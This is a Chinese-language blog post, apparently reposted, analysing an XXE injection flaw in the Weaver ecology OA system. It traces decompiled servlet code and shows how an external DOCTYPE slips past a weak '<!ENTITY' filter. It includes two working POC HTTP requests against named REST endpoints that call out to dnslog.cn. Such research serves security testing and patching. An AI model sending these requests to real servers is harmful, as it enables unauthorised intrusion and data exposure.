泛微ecology ReceiveCCRequestByXml-XXE注入

uein / 2023-08-04 / 原文

ReceiveCCRequestByXml.class

WEAVER\ecology\classbean\weaver\rest\servlet\service\ofs\ReceiveCCRequestByXml.class

public void service(IRestRequest var1, IRestResponse var2) throws RestException {
    	//var3获取http请求的内容
        HttpServletRequest var3 = var1.getHttpRequest();
        Response var4 = new Response();
    	//getServletInputStreamContent将var3转化为string类型赋值给var5
        String var5 = ServletUtil.getServletInputStreamContent(var3, "UTF-8");
        if (!"".equals(var5)) {
            OfsTodoDataManagerNew var6 = new OfsTodoDataManagerNew();
            String var7 = ServletUtil.getIpAddress(var3);
            var6.setClientIp(var7);
            //receiveCCRequestByXml方法处理var5
            String var8 = var6.receiveCCRequestByXml(var5);
            var4.addMessage("result", var8);
        }

        var2.writeReponse(var4);
    }

直接看service函数就行,var3获取的是http的请求内容,然后通过getServletInputStreamContent方法将var3的内容转换为String类型赋值给var5,如果var5不为空,再通过OfsTodoDataManagerNewreceiveCCRequestByXml函数去处理var5

getServletInputStreamContent

getServletInputStreamContent函数简单说就是将刚才的var3转换string并在有换行的地方添加换行符然后返回给var5

receiveCCRequestByXml

第一步中调用xmlToMap函数处理传入的var5

xmlToMap

var1 = SecurityMethodUtil.clearEntity(var1);//做了安全检查进行过滤

SecurityMethodUtil.clearEntity

    public static String clearEntity(String xml) {
        if (xml != null && !"".equals(xml)) {
            return xml.toLowerCase().indexOf("entity") == -1 ? xml : xml.replaceAll("(?i)\\<\\!entity", "*");
        } else {
            return xml;
        }
    }

传入的字符串如果不为空,检查是否存在entity,如果字符串中不包含"entity",则直接返回;如果字符串中包含"entity",则使用replaceAll()方法将所有<!ENTITY替换为*

检查完之后xmlToMap执行DocumentHelper.parseText

Document var3 = DocumentHelper.parseText(var1);

其实在这里就是org.dom4j.DocumentHelper.parseText去解析xml了

还有一个deleteRequestInfoByXml代码上是差不多的也是可以XXE的就不接着写了

POC1

ReceiveCCRequestByXml

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 133

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>

POC2

deleteRequestInfoByXml

POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 131

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn/aa">
<M><syscode>&send;</syscode></M>

泛微ecology ReceiveCCRequestByXml-XXE注入更多相关文章

Android 哪些系统应用没法禁用(即哪些应用的禁用按钮是灰选)?

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

Java,启动!

2024/11/1日 日志 关于JavaScript简介&引入方式 以及基础语法的学习

android 13 更改手机信号调整

BFS(Breath First Search 广度优先搜索)

Angular 18 上手开发

单链表题+数组题(快慢指针和左右指针)

MySQL和Easy-Es语法对照表

DevOp相关

CSRF攻击与防御

华为云开源项目Sermant正式成为CNCF官方项目

spring-boot-configuration-processor无法生效

给网站添加春节灯笼效果:引入即用,附源码!

如何在鲲鹏平台上快速上手应用开发?鲲鹏DevKit给你答案

程序员的修炼之路

Java-中文官方教程-2022-版-一-

Java-中文官方教程-2022-版-五-

Java-中文官方教程-2022-版-四-

随机推荐

命令拼接技巧

Fiddler抓包Android7以内版本

SD NAND 与 SPI NAND

C语言中的编译过程详解

step7 V5.x上的SCL

yolo --- 核心思想

【游记】CCPC 济南 2024 游记

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java,启动!

什么是IT技术

即将到来!

2024/11/1日 日志 关于JavaScript简介&引入方式 以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

热门话题

Ethernaut Level 11: Elevator Attack and Blockchain Interaction

快速部署开源spug运维平台的Docker安装指南

驱动调试之printk的原理与使用

计算机思维模型及其应用

华为云发布代码大模型PanGu-Coder2,实现高效代码生成

Linux多硬盘数据存储和分区操作

构建高可用架构: 分层冗余与自动故障转移

LoRA:高效调参的大语言模型适应方法

《分布式系统的基本原理及互联网分层架构的本质》

Hadoop写流程解析

Java架构师的系统架构设计方法论中的规范要点

使用observeDOM解决BetterScroll插件在移动端无法滑动的问题

互联网一致性架构设计实践

高并发系统架构与水平扩展

混合应用的崛起:跨平台开发取代原生应用

  穗舟网 (www.seizhou.com)

本站除标明"本站原创"外所有文章版权归创作人所有,本站不承担任何法律责任和连带责任,如有冒犯请直接联系,我们将立即予以纠正并致歉。

Powered by WordPress  ·  v1.0.0-alpha